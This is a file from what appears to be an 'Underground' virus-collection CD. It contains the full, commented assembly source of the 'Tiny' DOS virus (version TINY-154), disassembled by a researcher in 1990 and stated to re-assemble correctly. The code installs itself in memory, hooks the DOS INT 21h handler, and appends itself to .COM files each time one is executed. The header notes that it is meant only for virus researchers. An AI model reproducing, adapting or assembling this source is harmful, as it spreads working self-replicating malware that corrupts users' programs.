Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / zrodla / t / tiny-154.asm < prev next >

Wrap

Assembly Source File | 1998-01-14 | 4.3 KB | 182 lines

page ,132 name TINY154 title The 'Tiny' virus, version TINY-154 .radix 16 ; ╔══════════════════════════════════════════════════════════════════════════╗ ; ║ Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ║ ; ║ Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ║ ; ║ ║ ; ║ The 'Tiny' Virus, version TINY-154 ║ ; ║ Disassembled by Vesselin Bontchev, September 1990 ║ ; ║ ║ ; ║ Copyright (c) Vesselin Bontchev 1989, 1990 ║ ; ║ ║ ; ║ This listing is only to be made available to virus researchers ║ ; ║ or software writers on a need-to-know basis. ║ ; ╚══════════════════════════════════════════════════════════════════════════╝ ; The disassembly has been tested by re-assembly using MASM 5.0. code segment assume cs:code, ds:code org 100 seg_60 equ 600 v_len equ v_end-first4 start: jmp v_entry ; Jump to virus code db 'M' ; Virus signature mov ax,4C00 ; Program terminate int 21 ; The original first 4 bytes of the infected file: first4 db 0EBh, 2, 90, 90 v_entry: mov si,0FF ; Determine the start addres of the virus body add si,[si+2] mov di,offset start ; Put the addres of program start on the stack push di ; Now a Near RET instruction will jump there push ax ; Save AX (to keep programs as DISKCOPY happy) movsw ; Restore the original first 4 bytes movsw mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) xor cx,cx ; ES := 0 mov es,cx mov cl,v_len-2 ; CX := virus length lodsw ; Check if virus is present in memory scasw je run ; Just run the program if so ; Virus not in memory. Install it there: dec di ; Adjust DI dec di stosw ; Store the first word of the virus body rep movsb ; Store the rest of the virus mov di,32*4 ; Old INT 21h handler will be moved to INT 32h mov ax,int_21-first4+seg_60 ; Move the INT 21h handler to INT 32h and ; install int_21 as new INT 21h handler: xchg ax,cx vect_cpy: xchg ax,cx xchg ax,word ptr es:[di-(32-21)*4] stosw jcxz vect_cpy ; Loop until done run: pop ax ; Restore AX push ds ; ES := DS pop es ; Jump to program start via funny RET instruction: ret int_21: ; New INT 21h handler cmp ax,4B00 ; EXEC function call? jne end_21 ; Exit if not push ax ; Save registers used push bx push cx push dx push di push ds push es push cs ; ES := CS pop es mov ax,3D02 ; Open the file for both reading and writting int 32 jc end_exec ; Exit on error xchg ax,bx ; Save the file handle in BX call lseek1 mov ah,3F ; Read the first 4 bytes of the file mov di,dx ; Save first4 address in DI push cs ; DS := CS pop ds int 32 ; Do it ; Check whether the file is already infected or is an .EXE file. ; The former contains the character `M' in its 3rd byte and ; the latter contains it either in the 0th or in the 1st byte. push di ; Save DI mov al,'M' ; Look for `M' repne scasb pop di ; Restore DI je close ; Exit if file not suitable for infection mov al,2 ; Seek to the end of file call lseek push ax ; Save file length mov cl,v_len ; Length of virus body mov ah,40 ; Append virus to file int 32 ; Do it call lseek1 ; Seek to the file beginning mov al,0E9 ; Near JMP opcode stosb ; Form the first instruction of the file pop ax ; Restore file length in AX inc ax stosw ; Form the JMP's opperand mov al,'M' ; Add a `M' character to mark the file stosb ; as infected mov ah,40 int 32 ; Do it close: mov ah,3E ; Close the file int 32 end_exec: pop es ; Restore used registers pop ds pop di pop dx pop cx pop bx pop ax ; Exit through the original INT 21h handler: end_21: jmp dword ptr cs:[32*4] lseek1: mov al,0 ; Lseek to file beginning lseek: mov ah,42 ; Lseek either to file beginning or to file end xor cx,cx xor dx,dx int 32 ; Do it mov dh,6 ; Put 6 in DH and 4 in CL mov cl,4 ret ; Done v_end equ $ ; End of virus body code ends end start